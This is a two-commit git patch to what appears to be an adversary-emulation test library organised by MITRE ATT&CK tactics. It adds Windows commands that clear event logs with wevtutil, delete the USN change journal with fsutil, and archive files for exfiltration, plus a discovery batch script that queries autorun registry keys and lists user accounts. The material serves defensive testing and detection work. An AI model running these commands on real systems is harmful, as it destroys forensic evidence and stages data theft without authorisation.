From 66c37e8b53b1bf4d5cadb342a50401e052d2b1ae Mon Sep 17 00:00:00 2001 From: Michael Haag <“mike@redcanary.com git config --global user.name “Michael Haag> Date: Tue, 31 Oct 2017 12:56:52 -0700 Subject: [PATCH 1/2] Evasion and exfil + Added wevtutil and fsutil per what was used recently by BadBuddy Ransomware. + Added 2 ways to compress data with Powershell and rar. --- .../Defense Evasion/Indicator_Removal_on_Host.md | 14 ++++++++++++++ Windows/Exfiltration/Data_Compressed.md | 11 +++++++++++ 2 files changed, 25 insertions(+) create mode 100644 Windows/Exfiltration/Data_Compressed.md diff --git a/Windows/Defense Evasion/Indicator_Removal_on_Host.md b/Windows/Defense Evasion/Indicator_Removal_on_Host.md index 635e4f78..5be6bba5 100644 --- a/Windows/Defense Evasion/Indicator_Removal_on_Host.md +++ b/Windows/Defense Evasion/Indicator_Removal_on_Host.md @@ -11,3 +11,17 @@ Clear system logs Clear Security logs wevtutil cl Security + +Clear Setup logs + + wevtutil cl Setup + +Clear Application logs + + wevtutil cl Application + +## Fsutil + +Manages the update sequence number (USN) change journal, which provides a persistent log of all changes made to files on the volume. + + fsutil usn deletejournal /D C: diff --git a/Windows/Exfiltration/Data_Compressed.md b/Windows/Exfiltration/Data_Compressed.md new file mode 100644 index 00000000..ac2307f9 --- /dev/null +++ b/Windows/Exfiltration/Data_Compressed.md @@ -0,0 +1,11 @@ +# File Deletion + +MITRE ATT&CK Technique: [T1002](https://attack.mitre.org/wiki/Technique/T1002) + +## PowerShell + + powershell.exe dir c:\* -Recurse | Compress-Archive -DestinationPath C:\test\Data.zip + +## Rar + + rar a -r exfilthis.rar *.docx From be85bb6afeb99ea3afdd9ac67fd8bb8b0b8fc486 Mon Sep 17 00:00:00 2001 From: Michael Haag <“mike@redcanary.com git config --global user.name “Michael Haag> Date: Tue, 31 Oct 2017 12:58:40 -0700 Subject: [PATCH 2/2] Discovery bat + Added reg queries to payload. --- Windows/Payloads/Discovery.bat | 17 +++++++++++++++++ 1 file changed, 17 insertions(+) diff --git a/Windows/Payloads/Discovery.bat b/Windows/Payloads/Discovery.bat index b7743df7..f11940f2 100644 --- a/Windows/Payloads/Discovery.bat +++ b/Windows/Payloads/Discovery.bat @@ -8,6 +8,23 @@ net config workstation net accounts net accounts /domain net view +reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows" +reg query HKLM\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce +reg query HKCU\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce +reg query HKLM\Software\Microsoft\Windows\CurrentVersion\RunServices +reg query HKCU\Software\Microsoft\Windows\CurrentVersion\RunServices +reg query HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify +reg query HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit +reg query HKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\\Shell +reg query HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\\Shell +reg query HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\ShellServiceObjectDelayLoad +reg query HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnce +reg query HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnceEx +reg query HKLM\Software\Microsoft\Windows\CurrentVersion\Run +reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Run +reg query HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce +reg query HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run +reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run wmic useraccount list wmic useraccount get /ALL wmic startup list brief